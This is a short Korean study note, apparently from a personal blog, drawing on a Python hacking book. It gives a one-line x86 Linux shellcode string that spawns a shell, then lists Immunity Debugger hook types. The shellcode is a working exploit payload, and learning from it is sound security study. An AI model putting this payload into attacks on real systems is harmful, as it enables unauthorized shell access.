KimSangLab

Linux 환경에서 Bash Shell 을 실행시켜주는 ShellCode 입니다.

"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"

Immunity Debugger는 13가지 후킹 기능을 지원하며 각 후킹은 독립 스크립트로 구현하거나 PyCommand 내부에서 구현할 수 있다.

 1) BpHook/LogBpHook : 브레이크 포인트가 발생될 때 호출 된다. BpHook는 대상 프로세스를 일시 정지 시키지만 LogBpHook는 그렇지 않다.
 2) AppExecptHook : 종류에 상관없이 예외가 발생하는 경우 호출된다.
 3) PostAnalysisHook : 디버가가 로드된 모듈에 대한 분석 작업이 끝났을 때 호출된다. 
 4) AccessViolationHook : 접근 위반이 발생할 때 마다 호출 된다.
 5) LoadDllHook/UnloadDllHok : DLL Load/Unload 시 호출 된다. 
 6) CreateThreadHook/ExitThreadHook : 스레스 생성 및 소멸 시 호출 된다.
 7) CreateProcessHook/ExitProcessHook : 프로세스 생성 및 소멸 시 호출 된다. 
 8) FastLogHook/STDCALLFastLogHook : 대상 프로세스의 특정 레지스터 값이나 메모리 주소를 로깅한다.

출처 : 파이썬 해킹 프로그래밍